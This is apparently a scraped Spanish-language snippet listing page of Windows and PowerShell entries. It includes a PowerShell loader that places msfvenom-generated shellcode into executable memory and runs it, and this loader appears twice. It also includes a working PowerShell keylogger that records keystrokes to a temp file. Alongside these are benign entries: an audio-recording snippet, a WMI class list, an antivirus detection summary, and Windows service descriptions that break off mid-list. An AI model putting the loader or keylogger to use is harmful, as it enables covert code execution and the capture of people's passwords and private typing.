THC-Hydra 8.6
(1 votes, average: 5.00 out of 5)
Loading...Hydra is born more than 10 years ago, this page is used as a recap of the functionalities it provides, […]
(1 votes, average: 5.00 out of 5)Loading... (1 votes, average: 5.00 out of 5)Loading...Analizar con Cheat Engine un payload de ejecución de comandos arbitrarios para ejecutar PowerShell
(No Ratings Yet)Loading...Script para cargar en memoria y ejecutar un payload de ejecución de comandos arbitrarios en PowerShell
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 | # Fuente: https://www.exploit-monday.com/2011/10/exploiting-powershells-features-not.html # Importar funciones necesarias $code = @" [DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect); [DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId); [DllImport("msvcrt.dll")] public static extern IntPtr memset(IntPtr dest, uint src, uint count); "@ # Añadir el código CSharp con las funciones necesarias para que puedan ser reconocidas en PowerShell $winFunc = Add-Type -memberDefinition $code -Name "Win32" -namespace Win32Functions -passthru # Declarar la variable que tiene la shellcode con el payload # msfvenom -p windows/exec CMD="powershell" EXITFUNC=thread -f powershell [Byte[]] $buf = 0xfc,0xe8,0x82,0x0,0x0,0x0,0x60,0x89,0xe5,0x31 $buf += 0xc0,0x64,0x8b,0x50,0x30,0x8b,0x52,0xc,0x8b,0x52 $buf += 0x14,0x8b,0x72,0x28,0xf,0xb7,0x4a,0x26,0x31,0xff $buf += 0xac,0x3c,0x61,0x7c,0x2,0x2c,0x20,0xc1,0xcf,0xd $buf += 0x1,0xc7,0xe2,0xf2,0x52,0x57,0x8b,0x52,0x10,0x8b $buf += 0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x1,0xd1 $buf += 0x51,0x8b,0x59,0x20,0x1,0xd3,0x8b,0x49,0x18,0xe3 $buf += 0x3a,0x49,0x8b,0x34,0x8b,0x1,0xd6,0x31,0xff,0xac $buf += 0xc1,0xcf,0xd,0x1,0xc7,0x38,0xe0,0x75,0xf6,0x3 $buf += 0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58 $buf += 0x24,0x1,0xd3,0x66,0x8b,0xc,0x4b,0x8b,0x58,0x1c $buf += 0x1,0xd3,0x8b,0x4,0x8b,0x1,0xd0,0x89,0x44,0x24 $buf += 0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x5f $buf += 0x5f,0x5a,0x8b,0x12,0xeb,0x8d,0x5d,0x6a,0x1,0x8d $buf += 0x85,0xb2,0x0,0x0,0x0,0x50,0x68,0x31,0x8b,0x6f $buf += 0x87,0xff,0xd5,0xbb,0xe0,0x1d,0x2a,0xa,0x68,0xa6 $buf += 0x95,0xbd,0x9d,0xff,0xd5,0x3c,0x6,0x7c,0xa,0x80 $buf += 0xfb,0xe0,0x75,0x5,0xbb,0x47,0x13,0x72,0x6f,0x6a $buf += 0x0,0x53,0xff,0xd5,0x70,0x6f,0x77,0x65,0x72,0x73 $buf += 0x68,0x65,0x6c,0x6c,0x0 # Calcular el tamaño necesario para la asignación VirtualAlloc $size = 0x1000 if ($buf.Length -gt 0x1000) {$size = $buf.Length} # Asignar una página de memoria # Solo funciona si el tamaño del tercer parámetro es al menos 0x1000 # Permisos RWX $x=$winFunc::VirtualAlloc(0,0x1000,$size,0x40) # Añadir la shellcode con el payload a la memoria for ($i=0;$i -le ($buf.Length-1);$i++) {$winFunc::memset([IntPtr]($x.ToInt32()+$i), $buf[$i], 1)} # Ejecutar el payload $winFunc::CreateThread(0,0,$x,0,0,0) |
Direcciones utilizadas para cargar […]
Keylogger sencillo con PowerShell
(1 votes, average: 5.00 out of 5)Loading...1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 | #Declarar funciones $signatures = @' [DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)] public static extern short GetAsyncKeyState(int virtualKeyCode); [DllImport("user32.dll", CharSet=CharSet.Auto)] public static extern int GetKeyboardState(byte[] keystate); [DllImport("user32.dll", CharSet=CharSet.Auto)] public static extern int MapVirtualKey(uint uCode, int uMapType); [DllImport("user32.dll", CharSet=CharSet.Auto)] public static extern int ToUnicode(uint wVirtKey, uint wScanCode, byte[] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags); '@ #Cargar las funciones declaradas $API = Add-Type -MemberDefinition $signatures -Name 'Win32' -Namespace API -PassThru try { #Bucle infinito para capturar pulsación de teclas while(1) { #Para cada uno de los caracteres ASCII for ($ascii = 9; $ascii -le 254; $ascii++) { #Capturar key state $state = $API::GetAsyncKeyState($ascii) #Si se ha pulsado una tecla if ($state -eq -32767) { #Traducir el código $virtualKey = $API::MapVirtualKey($ascii, 3) $kbstate = New-Object Byte[] 256 $checkkbstate = $API::GetKeyboardState($kbstate) $mychar = New-Object -TypeName System.Text.StringBuilder if($API::ToUnicode($ascii, $virtualKey, $kbstate, $mychar, $mychar.Capacity, 0)) { #Almacenar la tecla pulsada $value = [System.Text.Encoding]::Unicode.GetBytes($mychar) [System.IO.File]::AppendAllText("$env:temp\keys.txt", $mychar, [System.Text.Encoding]::Unicode) } } } } } finally { #Abrir el fichero con las teclas pulsadashola notepad $env:temp\keys.txt } |
Cargar en memoria y ejecutar un payload de ejecución de comandos arbitrarios en PowerShell
(No Ratings Yet)Loading...1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 | # Fuente: https://www.exploit-monday.com/2011/10/exploiting-powershells-features-not.html # Importar funciones necesarias $code = @" [DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect); [DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId); [DllImport("msvcrt.dll")] public static extern IntPtr memset(IntPtr dest, uint src, uint count); "@ # Añadir el código CSharp con las funciones necesarias para que puedan ser reconocidas en PowerShell $winFunc = Add-Type -memberDefinition $code -Name "Win32" -namespace Win32Functions -passthru # Declarar la variable que tiene la shellcode con el payload # msfvenom -p windows/exec CMD="powershell" EXITFUNC=thread -f powershell [Byte[]] $buf = 0xfc,0xe8,0x82,0x0,0x0,0x0,0x60,0x89,0xe5,0x31 $buf += 0xc0,0x64,0x8b,0x50,0x30,0x8b,0x52,0xc,0x8b,0x52 $buf += 0x14,0x8b,0x72,0x28,0xf,0xb7,0x4a,0x26,0x31,0xff $buf += 0xac,0x3c,0x61,0x7c,0x2,0x2c,0x20,0xc1,0xcf,0xd $buf += 0x1,0xc7,0xe2,0xf2,0x52,0x57,0x8b,0x52,0x10,0x8b $buf += 0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x1,0xd1 $buf += 0x51,0x8b,0x59,0x20,0x1,0xd3,0x8b,0x49,0x18,0xe3 $buf += 0x3a,0x49,0x8b,0x34,0x8b,0x1,0xd6,0x31,0xff,0xac $buf += 0xc1,0xcf,0xd,0x1,0xc7,0x38,0xe0,0x75,0xf6,0x3 $buf += 0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58 $buf += 0x24,0x1,0xd3,0x66,0x8b,0xc,0x4b,0x8b,0x58,0x1c $buf += 0x1,0xd3,0x8b,0x4,0x8b,0x1,0xd0,0x89,0x44,0x24 $buf += 0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x5f $buf += 0x5f,0x5a,0x8b,0x12,0xeb,0x8d,0x5d,0x6a,0x1,0x8d $buf += 0x85,0xb2,0x0,0x0,0x0,0x50,0x68,0x31,0x8b,0x6f $buf += 0x87,0xff,0xd5,0xbb,0xe0,0x1d,0x2a,0xa,0x68,0xa6 $buf += 0x95,0xbd,0x9d,0xff,0xd5,0x3c,0x6,0x7c,0xa,0x80 $buf += 0xfb,0xe0,0x75,0x5,0xbb,0x47,0x13,0x72,0x6f,0x6a $buf += 0x0,0x53,0xff,0xd5,0x70,0x6f,0x77,0x65,0x72,0x73 $buf += 0x68,0x65,0x6c,0x6c,0x0 # Calcular el tamaño necesario para la asignación VirtualAlloc $size = 0x1000 if ($buf.Length -gt 0x1000) {$size = $buf.Length} # Asignar una página de memoria # Solo funciona si el tamaño del tercer parámetro es al menos 0x1000 # Permisos RWX $x=$winFunc::VirtualAlloc(0,0x1000,$size,0x40) # Añadir la shellcode con el payload a la memoria for ($i=0;$i -le ($buf.Length-1);$i++) {$winFunc::memset([IntPtr]($x.ToInt32()+$i), $buf[$i], 1)} # Ejecutar el payload $winFunc::CreateThread(0,0,$x,0,0,0) |
Grabar audio desde la línea de comandos descargando desde Internet SoX
(No Ratings Yet)Loading...1 2 3 4 5 6 7 8 | #Descargar SoX Start-BitsTransfer "https://downloads.sourceforge.net/project/sox/sox/14.4.2/sox-14.4.2-win32.zip" #Descomprimir Expand-Archive .\sox-14.4.2-win32.zip #Acceder sox.exe cd .\sox-14.4.2-win32\sox-14.4.2 #Ejecutar sox.exe .\sox.exe -t waveaudio −d audio.wav |
Win32 Classes (Windows)
(No Ratings Yet)Loading...1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 | Win32_1394Controller Win32_1394ControllerDevice Win32_Account Win32_AccountSID Win32_ACE Win32_ActiveRoute Win32_AllocatedResource Win32_AssociatedProcessorMemory Win32_AutochkSetting Win32_BaseBoard Win32_BaseService Win32_Battery Win32_BIOS Win32_BootConfiguration Win32_Bus Win32_CacheMemory Win32_CDROMDrive Win32_CIMLogicalDeviceCIMDataFile Win32_ClassicCOMApplicationClasses Win32_ClassicCOMClass Win32_ClassicCOMClassSettings Win32_ClientApplicationSetting Win32_CollectionStatistics Win32_COMApplication Win32_COMApplicationClasses Win32_COMApplicationSettings Win32_COMClass Win32_ComClassAutoEmulator Win32_ComClassEmulator Win32_ComponentCategory Win32_ComputerShutdownEvent Win32_ComputerSystem Win32_ComputerSystemEvent Win32_ComputerSystemProcessor Win32_ComputerSystemProduct Win32_ComputerSystemWindowsProductActivationSetting Win32_COMSetting Win32_ConnectionShare Win32_ControllerHasHub Win32_CurrentProbe Win32_CurrentTime Win32_DCOMApplication Win32_DCOMApplicationAccessAllowedSetting Win32_DCOMApplicationLaunchAllowedSetting Win32_DCOMApplicationSetting Win32_DependentService Win32_Desktop Win32_DesktopMonitor Win32_DeviceBus Win32_DeviceChangeEvent Win32_DeviceMemoryAddress Win32_DeviceSettings Win32_DFSNode Win32_DFSNodeTarget Win32_DFSTarget Win32_Directory Win32_DirectorySpecification Win32_DiskDrive Win32_DiskDriveToDiskPartition Win32_DiskPartition Win32_DiskQuota Win32_DisplayControllerConfiguration Win32_DMAChannel Win32_DriverForDevice Win32_Environment Win32_Fan Win32_FloppyController Win32_FloppyDrive Win32_Group Win32_GroupInDomain Win32_GroupUser Win32_HeatPipe Win32_IDEController Win32_IDEControllerDevice Win32_ImplementedCategory Win32_InfraredDevice Win32_IP4PersistedRouteTable Win32_IP4RouteTable Win32_IP4RouteTableEvent Win32_IRQResource Win32_Keyboard Win32_LoadOrderGroup Win32_LoadOrderGroupServiceDependencies Win32_LoadOrderGroupServiceMembers Win32_LocalTime Win32_LogicalDisk Win32_LogicalDiskRootDirectory Win32_LogicalDiskToPartition Win32_LogicalFileAccess Win32_LogicalFileAuditing Win32_LogicalFileGroup Win32_LogicalFileOwner Win32_LogicalFileSecuritySetting Win32_LogicalProgramGroup Win32_LogicalProgramGroupDirectory Win32_LogicalProgramGroupItem Win32_LogicalProgramGroupItemDataFile Win32_LogicalShareAccess Win32_LogicalShareAuditing Win32_LogicalShareSecuritySetting Win32_LogonSession Win32_LogonSessionMappedDisk Win32_LUID Win32_LUIDandAttributes Win32_MappedLogicalDisk Win32_MemoryArray Win32_MemoryArrayLocation Win32_MemoryDevice Win32_MemoryDeviceArray Win32_MemoryDeviceLocation Win32_MethodParameterClass Win32_ModuleLoadTrace Win32_ModuleTrace Win32_MotherboardDevice Win32_NamedJobObject Win32_NamedJobObjectActgInfo Win32_NamedJobObjectLimit Win32_NamedJobObjectLimitSetting Win32_NamedJobObjectProcess Win32_NamedJobObjectSecLimit Win32_NamedJobObjectSecLimitSetting Win32_NamedJobObjectStatistics Win32_NetworkAdapter Win32_NetworkAdapterConfiguration Win32_NetworkAdapterSetting Win32_NetworkClient Win32_NetworkConnection Win32_NetworkLoginProfile Win32_NetworkProtocol Win32_NTDomain Win32_NTEventlogFile Win32_NTLogEvent Win32_NTLogEventComputer Win32_NTLogEventLog Win32_NTLogEventUser Win32_OnBoardDevice Win32_OperatingSystem Win32_OperatingSystemAutochkSetting Win32_OperatingSystemQFE Win32_OSRecoveryConfiguration Win32_PageFile Win32_PageFileElementSetting Win32_PageFileSetting Win32_PageFileUsage Win32_ParallelPort Win32_PCMCIAController Win32_Perf Win32_PerfFormattedData Win32_PerfRawData Win32_PhysicalMedia Win32_PhysicalMemory Win32_PhysicalMemoryArray Win32_PhysicalMemoryLocation Win32_PingStatus Win32_PNPAllocatedResource Win32_PNPDevice Win32_PNPEntity Win32_PointingDevice Win32_PortableBattery Win32_PortConnector Win32_PortResource Win32_POTSModem Win32_POTSModemToSerialPort Win32_PowerManagementEvent Win32_Printer Win32_PrinterConfiguration Win32_PrinterController Win32_PrinterDriver Win32_PrinterDriverDll Win32_PrinterSetting Win32_PrinterShare Win32_PrintJob Win32_PrivilegesStatus Win32_Process Win32_Processor Win32_ProcessStartTrace Win32_ProcessStartup Win32_ProcessStopTrace Win32_ProcessTrace Win32_ProgramGroupContents Win32_ProgramGroupOrItem Win32_ProtocolBinding Win32_Proxy Win32_QuickFixEngineering Win32_QuotaSetting Win32_Refrigeration Win32_Registry Win32_ScheduledJob Win32_SCSIController Win32_SCSIControllerDevice Win32_SecurityDescriptor Win32_SecuritySetting Win32_SecuritySettingAccess Win32_SecuritySettingAuditing Win32_SecuritySettingGroup Win32_SecuritySettingOfLogicalFile Win32_SecuritySettingOfLogicalShare Win32_SecuritySettingOfObject Win32_SecuritySettingOwner Win32_SerialPort Win32_SerialPortConfiguration Win32_SerialPortSetting Win32_ServerConnection Win32_ServerSession Win32_Service Win32_SessionConnection Win32_SessionProcess Win32_ShadowBy Win32_ShadowContext Win32_ShadowCopy Win32_ShadowDiffVolumeSupport Win32_ShadowFor Win32_ShadowOn Win32_ShadowProvider Win32_ShadowStorage Win32_ShadowVolumeSupport Win32_Share Win32_ShareToDirectory Win32_ShortcutFile Win32_SID Win32_SIDandAttributes Win32_SMBIOSMemory Win32_SoundDevice Win32_StartupCommand Win32_SubDirectory Win32_SystemAccount Win32_SystemBIOS Win32_SystemBootConfiguration Win32_SystemConfigurationChangeEvent Win32_SystemDesktop Win32_SystemDevices Win32_SystemDriver Win32_SystemDriverPNPEntity Win32_SystemEnclosure Win32_SystemLoadOrderGroups Win32_SystemMemoryResource Win32_SystemNetworkConnections Win32_SystemOperatingSystem Win32_SystemPartitions Win32_SystemProcesses Win32_SystemProgramGroups Win32_SystemResources Win32_SystemServices Win32_SystemSetting Win32_SystemSlot Win32_SystemSystemDriver Win32_SystemTimeZone Win32_SystemTrace Win32_SystemUsers Win32_TapeDrive Win32_TCPIPPrinterPort Win32_TemperatureProbe Win32_Thread Win32_ThreadStartTrace Win32_ThreadStopTrace Win32_ThreadTrace Win32_TimeZone Win32_TokenGroups Win32_TokenPrivileges Win32_Trustee Win32_USBController Win32_USBControllerDevice Win32_USBHub Win32_UserAccount Win32_UserDesktop Win32_UserInDomain Win32_UTCTime Win32_VideoController Win32_VideoSettings Win32_VoltageProbe Win32_Volume Win32_Volume Win32_VolumeChangeEvent Win32_VolumeQuota Win32_VolumeQuotaSetting Win32_VolumeUserQuota Win32_VolumeUserQuota Win32_WindowsProductActivation Win32_WMIElementSetting Win32_WMISetting |
Virus WinRARw.exe – ispyu.exe – Ice Software
(No Ratings Yet)Loading...Antivirus Resultado Actualización Bkav W32.FamVT.RazyNHmA.Trojan 20161229 CrowdStrike Falcon (ML) malicious_confidence_91% (D) 20161024 Invincea worm.win32.gamarue.an 20161216 Kaspersky UDS:DangerousObject.Multi.Generic 20161230 Qihoo-360 HEUR/QVM09.0.0000.Malware.Gen […]
Windows services (detailed)
(No Ratings Yet)Loading...1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 | AJRouter: Enruta los mensajes AllJoyn de los clientes AllJoyn locales. Si este servicio se interrumpe, los clientes AllJoyn que no tengan sus propios enrutadores integrados no podrán ejecutarse. ALG: Proporciona compatibilidad entre los complementos de protocolo de terceros y la Conexión compartida a Internet. AppIDSvc: Determina y comprueba la identidad de una aplicación. Si se deshabilita este servicio, no se aplicará AppLocker. Appinfo: Facilita la ejecución de aplicaciones interactivas con privilegios administrativos adicionales. Si este servicio se detiene, los usuarios no podrán iniciar las aplicaciones con los privilegios administrativos adicionales necesarios para realizar las tareas de usuario deseadas. AppReadiness: Preparar las aplicaciones para que se usen por primera vez cuando un usuario inicie sesión en este equipo y al agregar nuevas aplicaciones. AppXSvc: Proporciona compatibilidad con infraestructuras para la implementación de aplicaciones de la Tienda. Este servicio se inicia bajo petición y, si está deshabilitado, las aplicaciones de la Tienda no se implementarán en el sistema y podrían no funcionar correctamente. AudioEndpointBuilder: Administra los dispositivos de audio para el servicio de Audio de Windows. Si este servicio se detiene, los dispositivos y efectos de audio no funcionarán correctamente. Si este servicio se deshabilita, no se podrá iniciar ningún servicio que dependa explícitamente de él. Audiosrv: Administra el audio para programas basados en Windows. Si este servicio se detiene, los dispositivos y efectos de audio no funcionarán correctamente. Si este servicio se deshabilita, no se podrá iniciar ningún servicio que dependa explícitamente de él. AxInstSV: Proporciona validación de Control de cuentas de usuario para la instalación de controles ActiveX desde Internet y habilita la administración de la instalación de controles ActiveX basada en la configuración de directiva de grupo. Este servicio se inicia a petición y, si se deshabilita, la instalación de controles ActiveX se realizará según la configuración predeterminada del explorador. BDESVC: BDESVC hospeda el servicio Cifrado de unidad BitLocker. El Cifrado de unidad BitLocker proporciona un inicio seguro del sistema operativo, así como un cifrado de volumen completo para volúmenes extraíbles, fijos o del sistema operativo. Este servicio permite que BitLocker solicite a los usuarios diversas acciones relacionadas con sus volúmenes cuando se montan, y desbloquea los volúmenes automáticamente sin la intervención del usuario. Además, almacena la información de recuperación en Active Directory, si está disponible, y se asegura, si fuera necesario, de que se usen los certificados de recuperación más recientes. Si se detiene o se deshabilita este servicio, los usuarios no podrán sacar provecho de esta función. BFE: El Motor de filtrado de base (BFE) es un servicio que administra las directivas de firewall y del protocolo de seguridad de Internet (IPsec) e implementa el filtrado de modo usuario. Si se detiene o deshabilita el servicio BFE, se reducirá de forma significativa la seguridad del sistema. También dará lugar a un comportamiento impredecible en las aplicaciones de administración de IPsec y firewall. BITS: Transfiere archivos en segundo plano mediante el uso de ancho de banda de red inactivo. Si el servicio está deshabilitado, las aplicaciones que dependen de BITS, como Windows Update o MSN Explorer, no podrán descargar programas ni otra información de forma automática. BrokerInfrastructure: Servicio de infraestructura de Windows que controla qué tareas en segundo plano se pueden ejecutar en el sistema. Browser: Mantiene una lista actualizada de equipos en la red y proporciona esta lista a los equipos designados como exploradores. Si se detiene este servicio, esta lista no se actualizará o mantendrá. Si se deshabilita el servicio, no se podrá iniciar ninguno de los servicios que dependan explícitamente de él. BthHFSrv: Permite que se ejecuten en este equipo auriculares Bluetooth inalámbricos. Si se detiene o deshabilita este servicio, los auriculares Bluetooth no funcionarán correctamente en este equipo. bthserv: El servicio Bluetooth admite la detección y la asociación de dispositivos Bluetooth remotos. Si el servicio se detiene o deshabilita, puede que los dispositivos Bluetooth ya instalados dejen de funcionar correctamente y no se puedan detectar ni asociar dispositivos nuevos. CDPSvc: Este servicio se usa en escenarios de dispositivos conectados y Universal Glass CertPropSvc: Copia los certificados de usuario y certificados raíz de tarjetas inteligentes en el almacén de certificados del usuario actual, detecta la inserción de una tarjeta inteligente en un lector de tarjetas inteligentes y, si es necesario, instala el minicontrolador Plug and Play para tarjetas inteligentes. ClipSVC: Proporciona compatibilidad con infraestructura para Microsoft Store. Este servicio se inicia a petición y, si se deshabilita, las aplicaciones compradas en la Tienda Windows no funcionarán correctamente. COMSysApp: Administra la configuración y el seguimiento de los componentes del Modelo de objetos componentes (COM+). Si se detiene el servicio, la mayoría de los componentes COM+ no funcionarán correctamente. Si se deshabilita este servicio, no se podrá iniciar ningún servicio que dependa específicamente de él. CoreMessagingRegistrar: Manages communication between system components. cphs: Intel(R) Content Protection HECI Service - enables communication with the Content Protection FW CryptSvc: Proporciona tres servicios de administración: Servicio de catálogo de base de datos, que confirma las firmas de archivos de Windows y permite la instalación de nuevos programas; Servicio de raíz protegida, que agrega y quita certificados de entidades de certificación raíz de confianza del equipo, y Servicio automático de actualización de certificados raíz, que recupera certificados raíz de Windows Update y habilita escenarios como SSL. Si se detiene este servicio, los servicios de administración mencionados no funcionarán correctamente. Si se deshabilita este servicio, no se podrán iniciar ninguno de los servicios que dependen explícitamente de él. DcomLaunch: El servicio DCOMLAUNCH inicia los servidores COM y DCOM en respuesta a las solicitudes de activación de objetos. Si este servicio se detiene o se deshabilita, los programas que usen COM o DCOM no funcionarán correctamente. Por ello, es muy recomendable que ejecute el servicio DCOMLAUNCH. DcpSvc: The DCP (Data Collection and Publishing) service supports first party apps to upload data to cloud. defragsvc: Ayuda al equipo a ejecutarse de manera más eficaz mediante la optimización de archivos en las unidades de almacenamiento. DeviceAssociationService: Permite el emparejamiento entre el sistema y dispositivos con cable e inalámbricos. DeviceInstall: Habilita un equipo para que reconozca y adapte los cambios de hardware con el menor esfuerzo por parte del usuario. Si se detiene o deshabilita este servicio, el sistema se volverá inestable. DevQueryBroker: Permite a las aplicaciones detectar dispositivos con una tarea en segundo plano Dhcp: Registra y actualiza las direcciones IP y los registros DNS en este equipo. Si se detiene este servicio, el equipo no recibirá direcciones IP dinámicas ni actualizaciones de DNS. Si se deshabilita este servicio, no se podrá iniciar ningún servicio que dependa explícitamente de él. diagnosticshub.standardcollector.service: Servicio Recopilador estándar del concentrador de diagnósticos. Cuando se ejecuta, este servicio recopila eventos ETW en tiempo real y los procesa. DiagTrack: El servicio Telemetría y experiencias del usuario conectado proporciona características compatibles con las experiencias del usuario conectado y en aplicación. Además, este servicio administra la transmisión y colección basada en eventos de información de uso y diagnóstico (que se usa para mejorar la experiencia y la calidad de la plataforma Windows) cuando la configuración de opción de directiva de uso y diagnóstico está habilitada en Comentarios y diagnósticos. DmEnrollmentSvc: Realiza actividades de inscripción de dispositivos para la administración de dispositivos dmwappushservice: Servicio de enrutamiento de mensajes de inserción WAP Dnscache: El servicio Cliente DNS (dnscache) almacena en caché los nombres de Sistema de nombres de dominio (DNS) y registra el nombre de equipo completo para este equipo. Si este servicio se detiene, los nombres DNS se seguirán resolviendo. Sin embargo, los resultados de las consultas de nombres DNS no se almacenarán en caché y el nombre del equipo no se registrará. Si este servicio se deshabilita, todos los servicios que dependen explícitamente de él no podrán iniciarse. DoSvc: Realiza tareas de optimización de entrega de contenido dot3svc: El Servicio de configuración automática de redes cableadas (DOT3SVC) se encarga de realizar la autenticación IEEE 802.1X en interfaces Ethernet. Si la implementación de la red cableada actual exige autenticación 802.1X, el servicio DOT3SVC debe configurarse de modo que se ejecute para establecer la conectividad de nivel 2 y/o proporcionar acceso a los recursos de red. Las redes cableadas que no exigen autenticación 802.1X no se verán afectadas por el servicio DOT3SVC. DPS: El Servicio de directivas de diagnóstico permite detectar, solucionar y resolver problemas de componentes de Windows. Si se detiene este servicio, los diagnósticos dejarán de funcionar. DsmSvc: Habilita la detección, la descarga y la instalación del software relacionado con el dispositivo. Si se deshabilita este servicio, los dispositivos podrían configurarse con un software desfasado y podrían no funcionar correctamente. DsSvc: Proporciona servicios de administración de datos entre aplicaciones. EapHost: El servicio Protocolo de autenticación extensible (EAP) proporciona autenticación de red en escenarios como 802.1x con cable e inalámbrica, VPN y Protección de acceso a redes (NAP). EAP también proporciona interfaces de programación de aplicaciones (API) usadas por clientes de acceso a redes, incluidos clientes inalámbricos y VPN, durante el proceso de autenticación. Si deshabilita este servicio, este equipo no podrá obtener acceso a redes que requieran autenticación EAP. EFS: Proporciona la tecnología de cifrado de archivos básica usada para almacenar archivos cifrados en volúmenes del sistema de archivos NTFS. Si este servicio se detiene o se deshabilita, las aplicaciones no podrán tener acceso a los archivos cifrados. embeddedmode: El servicio de modo incrustado habilita escenarios relacionados con las aplicaciones en segundo plano. Al deshabilitar este servicio se impedirá que se activen las aplicaciones en segundo plano. EntAppSvc: Habilita la administración de aplicaciones de empresa. esifsvc: ESIF Upper Framework Service EventLog: Este servicio administra eventos y registros de eventos. Permite registrar eventos, consultar eventos, suscribirse a eventos, archivar registros de eventos y administrar metadatos de eventos. Puede mostrar los eventos en formato XML y de texto simple. Si se detiene este servicio, podría ponerse en peligro la seguridad y confiabilidad del sistema. EventSystem: Admite el Servicio de notificación de eventos del sistema (SENS), que proporciona la distribución automática de eventos a los componentes del Modelo de objetos componentes (COM). Si se detiene este servicio, SENS se cerrará y no podrá ofrecer notificaciones de inicio ni de cierre de sesión. Si se deshabilita el servicio, no se podrá iniciar ningún servicio que dependa específicamente de él. Fax: Le permite enviar y recibir faxes, con los recursos disponibles en este equipo o en la red. fdPHost: El servicio FDPHOST hospeda proveedores de detección de redes FD (detección de funciones). Estos proveedores FD proporcionan servicios de detección de redes para el Protocolo de detección de servicios simple (SSDP) y el protocolo de detección de servicios web (WS-D). Si se detiene o deshabilita el servicio FDPHOST, se deshabilitará la detección de redes para estos protocolos cuando se use FD. Si este servicio no está disponible, los servicios de red que usen FD y estén basados en estos protocolos de detección no podrán encontrar dispositivos o recursos de red. FDResPub: Publica este equipo y los recursos conectados a él para que puedan detectarse a través de la red. Si se detiene este servicio, los recursos de red dejarán de publicarse y no podrán detectarlos otros equipos de la red. fhsvc: Protege los archivos de usuario frente a pérdidas accidentales copiándolos en una ubicación de copia de seguridad FontCache: Optimiza el rendimiento de las aplicaciones copiando en la memoria caché los datos de fuente más usados. Las aplicaciones iniciarán este servicio si no se está ejecutando. Es posible deshabilitarlo, aunque si se hace, el rendimiento de las aplicaciones se reducirá. FrameServer: Permite que varios clientes tengan acceso a los fotogramas de vídeo de las cámaras. gpsvc: Este servicio es responsable de aplicar en el equipo y los usuarios la configuración establecida por los administradores, a través del componente Directiva de grupo. Si el servicio se deshabilita, la configuración no se aplicará y las aplicaciones y componentes no se podrán administrar a través de Directiva de grupo. Cualquier componente o aplicación que dependa del componente Directiva de grupo podría dejar de funcionar si el servicio se deshabilita. gupdate: Mantiene actualizado el software de Google. Si este servicio se inhabilita o se detiene, el software de Google no se mantendrá actualizado, lo que significa que las vulnerabilidades de seguridad que puedan surgir no se podrán solucionar y es posible que el rendimiento del producto se vea afectado. Este servicio se desinstala por sí solo cuando no lo está utilizando ningún software de Google. gupdatem: Mantiene actualizado el software de Google. Si este servicio se inhabilita o se detiene, el software de Google no se mantendrá actualizado, lo que significa que las vulnerabilidades de seguridad que puedan surgir no se podrán solucionar y es posible que el rendimiento del producto se vea afectado. Este servicio se desinstala por sí solo cuando no lo está utilizando ningún software de Google. hidserv: Activa y mantiene el uso de botones de acceso directo predefinidos en los teclados, controles remotos y otros dispositivos multimedia. Se recomienda mantener este servicio en ejecución. HomeGroupProvider: Realiza tareas de red asociadas con la configuración y el mantenimiento de los grupos en el 